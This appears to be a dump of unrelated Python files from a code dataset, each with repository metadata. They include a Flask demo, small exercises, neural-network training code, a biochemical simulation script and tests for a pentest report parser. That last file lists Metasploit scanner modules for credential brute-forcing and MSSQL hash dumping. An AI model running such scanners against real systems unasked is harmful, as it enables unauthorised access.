from flask import Flask, render_template, request import mymodule app = Flask(__name__) app.debug = True @app.route("/") def index(): name="Aleksander" return render_template('index.html',name=name) #retunrs all data @app.route("/data/") def alldata(): return mymodule.process() #an example of 1 paramter pass @app.route("/data/date=<date>") def data(date=0): return str(date) #return mymodule.process() #an example of x paramter pass @app.route("/datapost", methods=['GET','POST']) def datapost(): arguemtns = request.get_json() return "DATA:" if __name__ == "__main__": app.run()
[ "aleksander.fabijan@me.com" ]
aleksander.fabijan@me.com
c86e24d69cca136581dc75c9b380027f59bfa8d9
9b82603adcd8f5ffa9cc9a89b1cc5626ae0c671d
/pan5.py
be25fcb069f2b94db60e56db9513304f6515f444
[]
no_license
googlelxhgithub/testgit
101c2511610d5db9c1e83536c4098984b5624d3a
d371d0e7e03c4b6276e5af245f9b0ffbdb0f4d90
refs/heads/master
2023-08-17T08:14:08.780942
2021-09-27T23:04:38
2021-09-27T23:04:38
283,491,195
0
0
null
null
null
null
UTF-8
Python
false
false
1,072
py
# “倒计时”在我们日常生活中随处可见, # 比如:交通标志、开工仪式、庆祝活动、 火箭升空。 # 但最戏剧化的还是电影 007 中定时炸弹的倒计时,还有《三体》中的倒计时信号。 # 今天的问题是:输入一个目标时间(包括年、月、日、时、分、秒), # 如何写出从当前时间开始到目标时间的倒计时? from datetime import datetime import os import time DDay = input("目标日期(格式:YY/MM/DD HH:MM:SS) ") # 把输入的日期打印出来,此时是字符形式。 print(DDay) # 把字符形式转化为日期格式 DDay = datetime.strptime(DDay, "%Y/%m/%d %H:%M:%S") while True: os.system('cls') NDay = datetime.now() # print(DDay, NDay) D = DDay - NDay DD = D.days secs = D.seconds HH = secs // 3600 secs = secs % 3600 MM = secs // 60 secs = secs % 60 print(f"{DD}天{HH}时{MM}分{secs}秒") time.sleep(1) # cday = datetime.strptime("2017-8-1 18:20:20", "%Y-%m-%d %H:%M:%S") # print(cday) # print(cday.day)
[ "googlelxh@foxmail.com" ]
googlelxh@foxmail.com
5e53ab4f41caab7253868ca8b0b46d897ca04b95
a6588f6e38e90286549851bf38c76339d98d5d1e
/PythonOOP/basic07.py
248f5c9337e90b6db4f73aaac06cbaa3a4734f62
[]
no_license
Kamonphet/BasicPython
6c5213d7ec265e000370bb6b13eea8c2a84825ee
aa99bcbf0cf69dd61d7495a6e5f9ba608814a8cb
refs/heads/main
2023-07-24T00:35:01.916593
2021-09-09T13:23:06
2021-09-09T13:23:06
403,143,794
0
0
null
null
null
null
UTF-8
Python
false
false
2,479
py
# Inheritance การสืบทอดคุณสมบัติ => การสร้างสิ่งใหม่ขึ้นด้วยการสืบทอดหรือรับเอา # คุณสมบัติบางอย่างมากจากสิ่งเดิมที่มีอยู่แล้วโดยการสร้างเพิ่มเิมจากสิ่งที่มีอยู่แล้ว # แบ่งเป็น superclass และ subclass # superclass # super() => เรียกใช้งานคุณสมบัติในsuperclass # class Employee: class Employee: #class variable _minSalary = 12000 _maxSalary = 50000 def __init__(self,name,salary,department): # instance variable self._name = name #protected self.__salary = salary self.__department = department # protected medthod def _showdata(self): print("complete attribute") print("name = {}".format(self._name)) print("salary = ",self.__salary) print("Department = ",self.__department) def _getIncome(self) : return self.__salary*12 #แปลง obj เป็น str def __str__(self) : return ("EmployeeName = {} , Department = {} , SalaryPerYear = {}".format(self._name,self.__department,self._getIncome())) # subclass # class name(Employee): class Accounting(Employee): __departmentName = "แผนกบัญชี" def __init__(self,name,salary): super().__init__(name,salary,self.__departmentName) class Programmer(Employee): __departmentName = "แผนกพัฒนาระบบ" def __init__(self,name,salary): super().__init__(name,salary,self.__departmentName) # super()._showdata() class sale(Employee): __departmentName = "แผนกขาย" def __init__(self,name,salary): super().__init__(name,salary,self.__departmentName) # สร้างวัตถุ obj1 = Employee("phet",50000,"Teacher") obj2 = Employee("Flim",100000,"Bussines") obj3 = Employee("Family",150000,"House") account = Accounting('phet',40000) programmer = Programmer('flim',60000) Sale = sale('love',1000) #เรียกใช้ # print(Employee._maxSalary) # print(account._minSalary) # account._showdata() # print("Income = {}".format(account._getIncome())) # print(account.__str__())
[ "noreply@github.com" ]
noreply@github.com
4ba29b5b0658607d45ec4cddc703e57f647803a2
ee81efa621f8a18569d8ac00e5176aff1a736d86
/kornislav.py
37758a2ea9cf0c8c91688ee2dd1fcffcb9de4eeb
[]
no_license
renaldyresa/Kattis
c8b29f40a84f4161f49c6247abf10ec2ecc14810
e504f54602b054eeffaac48b43e70beb976ca94c
refs/heads/master
2021-12-01T14:57:57.614911
2021-11-29T07:44:43
2021-11-29T07:44:43
182,920,692
1
0
null
null
null
null
UTF-8
Python
false
false
74
py
data = list(map(int, input().split())) data.sort() print(data[0]*data[2])
[ "noreply@github.com" ]
noreply@github.com
6a12d1accfa480e4b12e2edf24372e30ecff77b8
7775d1f4db482114f734645f23a64fef1ef7e724
/model/ESTRNN.py
7ac59c92438ab761b5fd37a87b2257adbba998d8
[ "MIT" ]
permissive
RunqiuBao/Event_ESTRNN
f325820413cfc938cec420a7c88123b605e9e1e7
6d156cc42a3a33bd0b4b7c4c4be98f943ff53acb
refs/heads/master
2023-06-16T20:21:04.992942
2021-07-11T02:26:12
2021-07-11T02:26:12
360,787,970
0
0
null
null
null
null
UTF-8
Python
false
false
8,918
py
import torch import torch.nn as nn import torch.nn.functional as F from thop import profile from .arches import conv1x1, conv3x3, conv5x5, actFunc # Dense layer class dense_layer(nn.Module): def __init__(self, in_channels, growthRate, activation='relu'): super(dense_layer, self).__init__() self.conv = conv3x3(in_channels, growthRate) self.act = actFunc(activation) def forward(self, x): out = self.act(self.conv(x)) out = torch.cat((x, out), 1) return out # Residual dense block class RDB(nn.Module): def __init__(self, in_channels, growthRate, num_layer, activation='relu'): super(RDB, self).__init__() in_channels_ = in_channels modules = [] for i in range(num_layer): modules.append(dense_layer(in_channels_, growthRate, activation)) in_channels_ += growthRate self.dense_layers = nn.Sequential(*modules) self.conv1x1 = conv1x1(in_channels_, in_channels) def forward(self, x): out = self.dense_layers(x) out = self.conv1x1(out) out += x return out # Middle network of residual dense blocks class RDNet(nn.Module): def __init__(self, in_channels, growthRate, num_layer, num_blocks, activation='relu'): super(RDNet, self).__init__() self.num_blocks = num_blocks self.RDBs = nn.ModuleList() for i in range(num_blocks): self.RDBs.append(RDB(in_channels, growthRate, num_layer, activation)) self.conv1x1 = conv1x1(num_blocks * in_channels, in_channels) self.conv3x3 = conv3x3(in_channels, in_channels) def forward(self, x): out = [] h = x for i in range(self.num_blocks): h = self.RDBs[i](h) out.append(h) out = torch.cat(out, dim=1) out = self.conv1x1(out) out = self.conv3x3(out) return out # DownSampling module class RDB_DS(nn.Module): def __init__(self, in_channels, growthRate, num_layer, activation='relu'): super(RDB_DS, self).__init__() self.rdb = RDB(in_channels, growthRate, num_layer, activation) self.down_sampling = conv5x5(in_channels, 2 * in_channels, stride=2) def forward(self, x): # x: n,c,h,w x = self.rdb(x) out = self.down_sampling(x) return out # Global spatio-temporal attention module class GSA(nn.Module): def __init__(self, para): super(GSA, self).__init__() self.n_feats = para.n_features self.center = para.past_frames self.num_ff = para.future_frames self.num_fb = para.past_frames self.related_f = self.num_ff + 1 + self.num_fb self.F_f = nn.Sequential( nn.Linear(2 * (5 * self.n_feats), 4 * (5 * self.n_feats)), actFunc(para.activation), nn.Linear(4 * (5 * self.n_feats), 2 * (5 * self.n_feats)), nn.Sigmoid() ) # out channel: 160 self.F_p = nn.Sequential( conv1x1(2 * (5 * self.n_feats), 4 * (5 * self.n_feats)), conv1x1(4 * (5 * self.n_feats), 2 * (5 * self.n_feats)) ) # condense layer self.condense = conv1x1(2 * (5 * self.n_feats), 5 * self.n_feats) # fusion layer self.fusion = conv1x1(self.related_f * (5 * self.n_feats), self.related_f * (5 * self.n_feats)) def forward(self, hs): # hs: [(n=4,c=80,h=64,w=64), ..., (n,c,h,w)] self.nframes = len(hs) f_ref = hs[self.center] cor_l = [] for i in range(self.nframes): if i != self.center: cor = torch.cat([f_ref, hs[i]], dim=1) w = F.adaptive_avg_pool2d(cor, (1, 1)).squeeze() # (n,c) : (4, 160) if len(w.shape) == 1: w = w.unsqueeze(dim=0) w = self.F_f(w) w = w.reshape(*w.shape, 1, 1) cor = self.F_p(cor) cor = self.condense(w * cor) cor_l.append(cor) cor_l.append(f_ref) out = self.fusion(torch.cat(cor_l, dim=1)) return out # RDB-based RNN cell class RDBCell(nn.Module): def __init__(self, para): super(RDBCell, self).__init__() self.activation = para.activation self.n_feats = para.n_features self.n_blocks = para.n_blocks self.F_B0 = conv5x5(3, self.n_feats, stride=1) self.F_B1 = RDB_DS(in_channels=self.n_feats, growthRate=self.n_feats, num_layer=3, activation=self.activation) self.F_B2 = RDB_DS(in_channels=2 * self.n_feats, growthRate=int(self.n_feats * 3 / 2), num_layer=3, activation=self.activation) self.F_R = RDNet(in_channels=(1 + 4) * self.n_feats, growthRate=2 * self.n_feats, num_layer=3, num_blocks=self.n_blocks, activation=self.activation) # in: 80 # F_h: hidden state part self.F_h = nn.Sequential( conv3x3((1 + 4) * self.n_feats, self.n_feats), RDB(in_channels=self.n_feats, growthRate=self.n_feats, num_layer=3, activation=self.activation), conv3x3(self.n_feats, self.n_feats) ) def forward(self, x, s_last): out = self.F_B0(x) out = self.F_B1(out) out = self.F_B2(out) out = torch.cat([out, s_last], dim=1) out = self.F_R(out) s = self.F_h(out) return out, s # Reconstructor class Reconstructor(nn.Module): def __init__(self, para): super(Reconstructor, self).__init__() self.para = para self.num_ff = para.future_frames self.num_fb = para.past_frames self.related_f = self.num_ff + 1 + self.num_fb self.n_feats = para.n_features self.model = nn.Sequential( nn.ConvTranspose2d((5 * self.n_feats) * (self.related_f), 2 * self.n_feats, kernel_size=3, stride=2, padding=1, output_padding=1), nn.ConvTranspose2d(2 * self.n_feats, self.n_feats, kernel_size=3, stride=2, padding=1, output_padding=1), conv5x5(self.n_feats, 3, stride=1) ) def forward(self, x): return self.model(x) class Model(nn.Module): """ Efficient saptio-temporal recurrent neural network (ESTRNN, ECCV2020) """ def __init__(self, para): super(Model, self).__init__() self.para = para self.n_feats = para.n_features self.num_ff = para.future_frames self.num_fb = para.past_frames self.ds_ratio = 4 self.device = torch.device('cuda') self.cell = RDBCell(para) self.recons = Reconstructor(para) self.fusion = GSA(para) def forward(self, x, profile_flag=False): if profile_flag: return self.profile_forward(x) outputs, hs = [], [] batch_size, frames, channels, height, width = x.shape s_height = int(height / self.ds_ratio) s_width = int(width / self.ds_ratio) # forward h structure: (batch_size, channel, height, width) s = torch.zeros(batch_size, self.n_feats, s_height, s_width).to(self.device) for i in range(frames): h, s = self.cell(x[:, i, :, :, :], s) hs.append(h) for i in range(self.num_fb, frames - self.num_ff): out = self.fusion(hs[i - self.num_fb:i + self.num_ff + 1]) out = self.recons(out) outputs.append(out.unsqueeze(dim=1)) return torch.cat(outputs, dim=1) # For calculating GMACs def profile_forward(self, x): outputs, hs = [], [] batch_size, frames, channels, height, width = x.shape s_height = int(height / self.ds_ratio) s_width = int(width / self.ds_ratio) s = torch.zeros(batch_size, self.n_feats, s_height, s_width).to(self.device) for i in range(frames): h, s = self.cell(x[:, i, :, :, :], s) hs.append(h) for i in range(self.num_fb + self.num_ff): hs.append(torch.randn(*h.shape).to(self.device)) for i in range(self.num_fb, frames + self.num_fb): out = self.fusion(hs[i - self.num_fb:i + self.num_ff + 1]) out = self.recons(out) outputs.append(out.unsqueeze(dim=1)) return torch.cat(outputs, dim=1) def feed(model, iter_samples): inputs = iter_samples[0] outputs = model(inputs) return outputs def cost_profile(model, H, W, seq_length): x = torch.randn(1, seq_length, 3, H, W).cuda() profile_flag = True flops, params = profile(model, inputs=(x, profile_flag), verbose=False) return flops / seq_length, params
[ "zzh.tech@gmail.com" ]
zzh.tech@gmail.com
bf020a5eba52f22d341b35e48d8b8451ab99b48b
977724d5e811c5b54963908022752e3e3517d30e
/main.py
abc855110c8863f56aa8d3ef9792b6d1d220de75
[]
no_license
naem1023/CNN_DS
5f7ec702a3aebbf0866f73eb3995825a0ca7b528
5a686efa3858346339d5d6c5c0cb930a8fc498a3
refs/heads/master
2023-03-28T11:24:05.523790
2021-04-01T10:20:31
2021-04-01T10:20:31
322,156,987
0
0
null
null
null
null
UTF-8
Python
false
false
10,585
py
import read_train_file import model import numpy as np import matplotlib.pyplot as plt import os import cv2 import pandas as pd import time from multiprocessing import Process, Lock, Queue, Pool import multiprocessing from tqdm import tqdm from tqdm import trange import tensorflow as tf from tensorflow.keras.models import Sequential, load_model from tensorflow.keras.layers import Input, Conv2D, MaxPooling2D, Dense, Flatten, Dropout, BatchNormalization, Activation, ZeroPadding2D, GlobalAveragePooling2D from keras.utils import to_categorical from tensorflow.keras import initializers from sklearn.model_selection import StratifiedShuffleSplit import platform def plot_loss_curve(history): import matplotlib.pyplot as plt plt.figure(figsize=(15, 10)) plt.plot(history['loss']) plt.plot(history['val_loss']) plt.title('model loss') plt.ylabel('loss') plt.xlabel('epoch') plt.legend(['train', 'test'], loc='upper right') plt.show() def train_model(X_train, X_test, y_train, y_test, model): X_train = X_train.reshape(X_train.shape[0], 300, 300, 3) X_test = X_test.reshape(X_test.shape[0], 300, 300, 3) print("X_train.shape=", X_train.shape) print("y_train.shape", y_train.shape) print("X_test.shape=", X_test.shape) print("y_test.shape", y_test.shape) # print(y_train[0]) ''' softmax layer -> output=10개의 노드. 각각이 0부터 9까지 숫자를 대표하는 클래스 이를 위해서 y값을 one-hot encoding 표현법으로 변환 0: 1,0,0,0,0,0,0,0,0,0 1: 0,1,0,0,0,0,0,0,0,0 ... 5: 0,0,0,0,0,1,0,0,0,0 ''' # reformat via one-hot encoding y_train = to_categorical(y_train) y_test = to_categorical(y_test) # print(y_train[0]) # catergorical_crossentropy = using when multi classficiation # metrics = output data type model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy']) # batch_size : see batch_size data and set delta in gradient decsending history = model.fit(X_train, y_train, validation_data=(X_test, y_test), batch_size=16, epochs=30, verbose=1) plot_loss_curve(history.history) # print(history.history) print("train loss=", history.history['loss'][-1]) print("validation loss=", history.history['val_loss'][-1]) # save model in file # offering in KERAS model.save('model-201611263.model') history_df = pd.DataFrame(history.history) with open("history_data.csv", mode='w') as file: history_df.to_csv(file) return model def get_class_name(n): if n == 0: return "food" elif n == 1: return "interior" elif n == 2: return "exterior" def predict_image_sample(model, X_test, y_test, n): from random import randrange correct_count = 0; wrong_count = 0 for idx in range(n): if correct_count == 2 and wrong_count == 2: break test_sample_id = randrange(len(X_test)) test_image = X_test[test_sample_id] test_image = test_image.reshape(1, 300, 300, 3) # get answer y_actual = y_test[test_sample_id] # get prediction list y_pred = model.predict(test_image) # get prediction y_pred = np.argmax(y_pred, axis=1) # true, prediction is right if y_pred == y_actual and correct_count <= 2: plt.imshow(test_image[0]) plt.show() print("==right prediction==") print("y_actual number=", y_actual) print("y_actual class=", get_class_name(y_actual)) # 3 dimensiong print("y_pred number=", y_pred) print("y_pred number=", get_class_name(y_pred)) print() correct_count += 1 elif y_pred != y_actual and wrong_count <= 2: plt.imshow(test_image[0]) plt.show() print("==wrong prediction==") print("y_actual number=", y_actual) print("y_actual class=", get_class_name(y_actual)) # 3 dimensiong print("y_pred number=", y_pred) print("y_pred number=", get_class_name(y_pred)) print() wrong_count += 1 ''' if y_pred != y_actual: print("sample %d is wrong!" %test_sample_id) with open("wrong_samples.txt", "a") as errfile: print("%d"%test_sample_id, file=errfile) else: print("sample %d is correct!" %test_sample_id) ''' def shuffle_and_valdiate(X, y): print("start split and shuffle!") shuffle_split = StratifiedShuffleSplit(train_size=0.7, test_size=0.3, n_splits=1, random_state=0) for train_idx, test_idx in tqdm(shuffle_split.split(X, y)): X_train, X_test = X[train_idx], X[test_idx] y_train, y_test = y[train_idx], y[test_idx] # X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33, shuffle=True, random_state=42) print(X_train.shape) print(X_test.shape) return X_train, X_test, y_train, y_test def get_image(): image_dir = 'images' file_number = len(os.listdir(os.path.join(image_dir))) print(file_number) # np.zeros((300, 300, 3)) # X = np.zeros((file_number, 300, 300, 3), dtype=int) # # # y = np.zeros((file_number), dtype=int) X = list() y = list() for image_name in tqdm(os.listdir(os.path.join(image_dir))): image = cv2.imread(os.path.join(image_dir, image_name)) if image_name[:4] == "food": y.append(0) # y[idx] = 0 elif image_name[:8] == 'interior' : y.append(1) # y[idx] = 1 elif image_name[:8] == 'exterior': y.append(2) # y[idx] = 2 X.append(image) # X[idx] = image start_time = time.time() print("read complete") X = np.array(X) y = np.array(y) end_time = time.time() print("convert image to numpy time = ", end_time - start_time) print("converting complete") print(X.shape) print(y.shape) start_time = time.time() X_train, X_test, y_train, y_test = shuffle_and_valdiate(X, y) end_time = time.time() print("shuffle image time = ", end_time - start_time) # read_train_file.write_data(X_train, X_test, y_train, y_test) return X_train, X_test, y_train, y_test def make_common_model(): model = Sequential([ Input(shape=(300, 300, 3), name='input_layer'), # size of parameter = n_filters * (filter_size + 1) = 32*(9+1) = 320 # using 32 filter # filter size is 3 Conv2D(64, kernel_size=(1, 1)), BatchNormalization(), Activation('relu'), MaxPooling2D(pool_size=(2, 2)), Conv2D(32, kernel_size=(3, 3)), BatchNormalization(), Activation('relu'), MaxPooling2D(pool_size=(2, 2)), Conv2D(64, kernel_size=(1, 1)), BatchNormalization(), Activation('relu'), MaxPooling2D(pool_size=(2, 2)), Conv2D(32, kernel_size=(3, 3)), BatchNormalization(), Activation('relu'), MaxPooling2D(pool_size=(2, 2)), Conv2D(64, kernel_size=(1, 1)), BatchNormalization(), Activation('relu'), MaxPooling2D(pool_size=(2, 2)), Conv2D(32, kernel_size=(3, 3)), BatchNormalization(), Activation('relu'), MaxPooling2D(pool_size=(2, 2)), Flatten(), Dense(24, activation='relu'), Dropout(0.5), Dense(3, activation='softmax', name='output_layer') ]) model.summary() return model def make_resnet_model(): model = Sequential() model.add(Input(shape=(300, 300, 3), name='input_layer'),) model.add(ZeroPadding2D(padding=(3,3))) model.add(Conv2D(32, (10, 10), strides=2, kernel_initializer='he_normal')) model.add(BatchNormalization()) model.add(Activation('relu')) model.add(ZeroPadding2D(padding=(1, 1))) model.add(MaxPooling2D((2, 2), strides=1, padding='same')) model.add(Conv2D(32, (1, 1), strides=1, padding='valid', kernel_initializer='he_normal')) model.add(BatchNormalization()) model.add(Activation('relu')) model.add(Conv2D(32, (3, 3), strides=1, padding='same', kernel_initializer='he_normal')) model.add(BatchNormalization()) model.add(Activation('relu')) # model.add(MaxPooling2D((2, 2), strides=1, padding='same')) model.add(Conv2D(32, (1, 1), strides=2, padding='valid', kernel_initializer='he_normal')) model.add(BatchNormalization()) model.add(Activation('relu')) model.add(Conv2D(32, (3, 3), strides=1, padding='same', kernel_initializer='he_normal')) model.add(BatchNormalization()) model.add(Activation('relu')) model.add(Conv2D(32, (3, 3), strides=1, padding='valid', kernel_initializer='he_normal')) model.add(BatchNormalization()) model.add(Activation('relu')) # model.add(MaxPooling2D((2, 2), strides=1, padding='same')) # model.add(Conv2D(8, (1, 1), strides=1, padding='same', activation='relu', kernel_initializer='he_normal')) # model.add(Flatten()) # model.add(Dense(8, activation='relu')) # model.add(Dropout(0.5)) model.add(GlobalAveragePooling2D()) model.add(Dense(3, activation='softmax', name='output_layer')) model.summary() return model if __name__ == '__main__': print(platform.architecture()[0]) # import mnist # # mnist.train_mnist() all_start_time = time.time() start_time = time.time() # set tensorflow config = tf.compat.v1.ConfigProto() config.gpu_options.allow_growth = True session = tf.compat.v1.Session(config=config) tf.compat.v1.keras.backend.set_session(session) # model = make_resnet_model() model = model.model_resnet() # model = make_common_model() # get train and test data X_train, X_test, y_train, y_test = get_image() print("Get all image") end_time = time.time() print("read image time = ", end_time - start_time) # X_train, X_test, y_train, y_test = read_train_file.read_data() # print("Read all image") # start_time = time.time() model = train_model(X_train, X_test, y_train, y_test, model) model = load_model('model-201611263.model') predict_image_sample(model, X_test, y_test, 500) end_time = time.time() all_end_time = time.time() print("train elapsed time = ", end_time - start_time) print("all elapsed time = ", all_end_time - all_start_time)
[ "relilau00@gmail.com" ]
relilau00@gmail.com
610f110f48d5d27f54a0bc5be7c5258c9bb94d12
ddddc401695a23f595e42e25abfb16baa3da82ba
/educode/apps.py
bda8e94ca6e930c4de9057d5acc31779b253fc79
[ "BSD-3-Clause" ]
permissive
harshavardhan26082001/MovieApp
bf6a60dd03b0101ec7d0104414270bec610fff04
cc0e9b743b3f73322af93997901c3c24265ec870
refs/heads/main
2023-05-07T19:03:53.862739
2021-05-27T05:52:42
2021-05-27T05:52:42
370,947,037
1
0
null
null
null
null
UTF-8
Python
false
false
146
py
from django.apps import AppConfig class EducodeConfig(AppConfig): default_auto_field = 'django.db.models.BigAutoField' name = 'educode'
[ "harsha26082001@gmail.com" ]
harsha26082001@gmail.com
587c4dfea6b066d51ee614baaa03ef70152816ab
6fdb4a1a7ecb68dcddce8b03cb325578aaef3b33
/2013-02-02/home/atm.py
d7b8635cc00d58365fe6db7df244a1ab52bd9edc
[]
no_license
lowrey/checkio
19e62bf9383bb21a069bc782a99bbe0e2dcf09d2
be0090a4d444648b2295ee088bce0c0e2b4e190d
refs/heads/master
2021-01-23T12:05:17.214951
2014-06-09T03:34:50
2014-06-09T03:34:50
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,183
py
# Withdraw without any incident # 120 - 10 - 0.5 - 1% = floor(109.4) = 109 # 109 - 20 - 0.5 - 1% = floor(88.3) = 88 # 88 - 30 - 0.5 - 1% = floor(57.2) = 57 def withdraw(balance, amount): result = balance - amount one_percent = .01 * amount result -= (.5 + one_percent) return int(result) def check_amount(amount): if amount < 0: return False if (amount % 5) != 0: return False return True def checkio(data): balance, withdrawal = data for amount in withdrawal: if check_amount(amount): temp_balance = withdraw(balance, amount) if temp_balance >= 0: balance = temp_balance print balance return balance if __name__ == '__main__': assert checkio([120, [10 , 20, 30]]) == 57, 'First' # With one Insufficient Funds, and then withdraw 10 $ assert checkio([120, [200 , 10]]) == 109, 'Second' #with one incorrect amount assert checkio([120, [3, 10]]) == 109, 'Third' assert checkio([120, [200, 119]]) == 120 , 'Fourth' assert checkio([120, [120, 10, 122, 2, 10, 10, 30, 1]]) == 56, "It's mixed all base tests" print 'All Ok'
[ "lowrey@server.fake" ]
lowrey@server.fake
d71cabbf96f5623e576964651f4821ca2a0f0d60
89ed212f9fc3554b70e8785d7230d0835f47e68d
/unorganized_code/kp_single_molecule.py
c8a3a7bd60c98d8a195232e346fecf043f5f6d16
[ "MIT" ]
permissive
rganti/Channel_Capacity_T_Cell
b2499fe62631aae9e4fdd7cd2d0382fb1180ed33
62b9cba7a4248287598d06c010dcfcc4601a7006
refs/heads/master
2023-03-29T15:10:36.609260
2021-04-01T16:18:43
2021-04-01T16:18:43
275,271,929
2
1
null
null
null
null
UTF-8
Python
false
false
4,800
py
import argparse from realistic_network import TcrCycleSelfWithForeign, KPRealistic, make_and_cd from simulation_parameters import MembraneBindingParameters from ssc_tcr_membrane import MembraneSharedCommands class SingleMoleculeKprLs(TcrCycleSelfWithForeign): def __init__(self, arguments=None): TcrCycleSelfWithForeign.__init__(self, arguments=arguments) self.rate_constants = MembraneBindingParameters() del self.n_initial['Lf'] del self.n_initial['Ls'] self.record = [] self.output = [] self.diffusion_flag = True def change_ligand_concentration(self, concentration): for i in range(concentration): name = "Ls{0}".format(i + 1) self.n_initial[name] = 1 # self.record.append(name) self.output.append(name) self.k_L_off[name] = self.rate_constants.k_self_off class SingleMoleculeKprLsLf(SingleMoleculeKprLs): def __init__(self, arguments=None): SingleMoleculeKprLs.__init__(self, arguments=arguments) self.lf = 3 for i in range(self.lf): name = "Lf{0}".format(i + 1) self.n_initial[name] = 1 # self.record.append(name) self.output.append(name) self.k_L_off[name] = self.rate_constants.k_foreign_off class KPRealisticSingleMolecule(KPRealistic): def __init__(self, self_foreign=False, arguments=None): KPRealistic.__init__(self, self_foreign=self_foreign, arguments=arguments) if self.self_foreign_flag: self.ligand = SingleMoleculeKprLsLf(arguments=arguments) else: self.ligand = SingleMoleculeKprLs(arguments=arguments) self.single_molecule = True def define_diffusion(self, f): for key in self.ligand.diffusion_rate_dict.keys(): if self.ligand.diffusion_loc_dict[key] == "Plasma": f.write("diffusion {0} at {1} in {2}\n".format(key, self.ligand.diffusion_rate_dict[key], self.ligand.diffusion_loc_dict[key])) else: f.write( "diffusion {0} at {1} in {2}, Cytosol<->Plasma\n".format(key, self.ligand.diffusion_rate_dict[key], self.ligand.diffusion_loc_dict[key])) def generate_ssc_script(self, simulation_name): script_name = simulation_name + ".rxn" shared = MembraneSharedCommands(self.ligand.n_initial, self.ligand.record, self.ligand.diffusion_loc_dict) f = open(script_name, "w") n = open("ordered_network", "w") self.regions.define_membrane_region(f) f.write("-- Forward reactions \n") n.write("# Forward Reactions \n") self.define_reactions(f, self.ligand.forward_rxns, self.ligand.forward_rates, n) n.write("\n# Reverse Reactions \n") f.write("\n-- Reverse reactions \n") self.define_reactions(f, self.ligand.reverse_rxns, self.ligand.reverse_rates, n) f.write("\n") if self.ligand.diffusion_flag: f.write("\n-- Diffusion \n") self.define_diffusion(f) f.write("\n") shared.initialize(f) f.write("\n") shared.record_species(f) n.close() f.close() if __name__ == "__main__": parser = argparse.ArgumentParser(description="Submitting job for single step KPR", formatter_class=argparse.ArgumentDefaultsHelpFormatter) parser.add_argument('--run', action='store_true', default=False, help='Flag for submitting simulations.') parser.add_argument('--ss', action='store_true', default=False, help="flag for checking if sims approach steady-state.") parser.add_argument('--steps', dest='steps', action='store', type=int, default=0, help="number of KP steps.") parser.add_argument('--ls', action='store_true', default=False, help="flag for submitting Ls calculations.") parser.add_argument('--ls_lf', dest='ls_lf', action='store', type=int, default=3, help="number of foreign ligands.") args = parser.parse_args() directory_name = "{0}_step".format(args.steps) make_and_cd(directory_name) if args.ls: sub_directory = "Ls" make_and_cd(sub_directory) kp = KPRealisticSingleMolecule(arguments=args) elif args.ls_lf: sub_directory = "Ls_Lf" # make_and_cd(sub_directory) kp = KPRealisticSingleMolecule(self_foreign=True, arguments=args) else: raise Exception("Need to specify Ls or Ls_Lf") kp.main_script(run=args.run)
[ "rg468@cam.ac.uk" ]
rg468@cam.ac.uk
b30f5537526f3f947a1bf63a0c422307f10c78e4
8b495f11fe76002342304092bd04338dcdee2378
/tests/metasploit/test.py
6e78227fc7040098fcb7e69447004d7b61e0a6b4
[ "BSD-3-Clause" ]
permissive
cacalote/ptp
bd88c6ba253f4fb8d4a339730cda41f7b29ade39
720e9f8b33a15eb9ff88f858a68c99f30e37982e
refs/heads/master
2020-09-15T13:29:49.671521
2015-05-20T15:41:02
2015-05-20T15:41:02
null
0
0
null
null
null
null
UTF-8
Python
false
false
3,644
py
from __future__ import print_function import os import traceback from ptp import PTP from ptp.libptp.constants import UNKNOWN, INFO, LOW, MEDIUM, HIGH __testname__ = 'metasploit' REPORTS = { # Scanner 'auxiliary/scanner/ftp/anonymous': { 'report_low.txt': LOW, 'report_high.txt': HIGH, }, 'auxiliary/scanner/ftp/ftp_version': { 'report_info.txt': INFO, 'report_info2.txt': INFO, }, 'auxiliary/scanner/ftp/ftp_login': { 'report_low.txt': LOW, 'report_high.txt': HIGH, }, 'auxiliary/scanner/smtp/smtp_enum': { 'report_low.txt': LOW, 'report_low2.txt': LOW, }, 'auxiliary/scanner/vnc/vnc_login': { 'report_high.txt': HIGH, 'report_high2.txt': HIGH, }, 'auxiliary/scanner/vnc/vnc_none_auth': { 'report_high.txt': HIGH, }, 'auxiliary/scanner/x11/open_x11': { 'report_high.txt': HIGH, 'report_high2.txt': HIGH, }, # TODO: Add report examples for EMC AlphaStor. 'auxiliary/scanner/mssql/mssql_ping': { 'report_info.txt': INFO, 'report_info2.txt': INFO, 'report_info3.txt': INFO, }, 'auxiliary/scanner/mssql/mssql_login': { 'report_high.txt': HIGH, 'report_high2.txt': HIGH, }, 'auxiliary/scanner/mssql/mssql_hashdump': { 'report_high.txt': HIGH, }, # TODO: Add report examples for MSSQL Schema dump. # TODO: Add report examples for DCERPC endpoint mapper. # TODO: Add report examples for DCERPC hidden. 'auxiliary/scanner/smb/smb_version': { 'report_info.txt': INFO, 'report_info2.txt': INFO, 'report_info3.txt': INFO, }, 'auxiliary/scanner/smb/pipe_auditor': { 'report_info.txt': INFO, 'report_info2.txt': INFO, }, 'auxiliary/scanner/smb/smb_enumusers': { 'report_info.txt': INFO, 'report_info2.txt': INFO, 'report_info3.txt': INFO, }, 'auxiliary/scanner/smb/smb_login': { 'report_high.txt': HIGH, 'report_high2.txt': HIGH, 'report_unknown.txt': UNKNOWN, }, 'auxiliary/scanner/snmp/snmp_enumusers': { 'report_low.txt': LOW, }, # FIXME: Fix the snmp_enumshares signature. #'auxiliary/scanner/snmp/snmp_enumshares': { # 'report_low.txt': LOW, #}, # TODO: Add report examples for SNMP enums. # TODO: Add report examples for SNMP AIX version. 'auxiliary/scanner/snmp/snmp_login': { 'report_low.txt': LOW, 'report_high.txt': HIGH, 'report_high2.txt': HIGH, } } def run(): try: reports = REPORTS.iteritems() except AttributeError: # Python3 reports = REPORTS.items() for plugin, outputs in reports: print('\t> %s' % plugin) for output in outputs: ptp = PTP('metasploit') print('\t\ttest parse():', end=' ') res = 'OK' try: ptp.parse( pathname=os.path.join( os.getcwd(), 'tests/metasploit/', plugin), filename=output, plugin=plugin) except Exception: print(traceback.format_exc()) res = 'FAIL' print(res) print('\t\ttest get_highest_ranking():', end=' ') res = 'OK' try: assert ptp.get_highest_ranking() == outputs[output] except Exception: print(traceback.format_exc()) res = 'FAIL' print(res)
[ "sauvage.tao@gmail.com" ]
sauvage.tao@gmail.com
55f4a31aab12f7a1297431badf330562a268656e
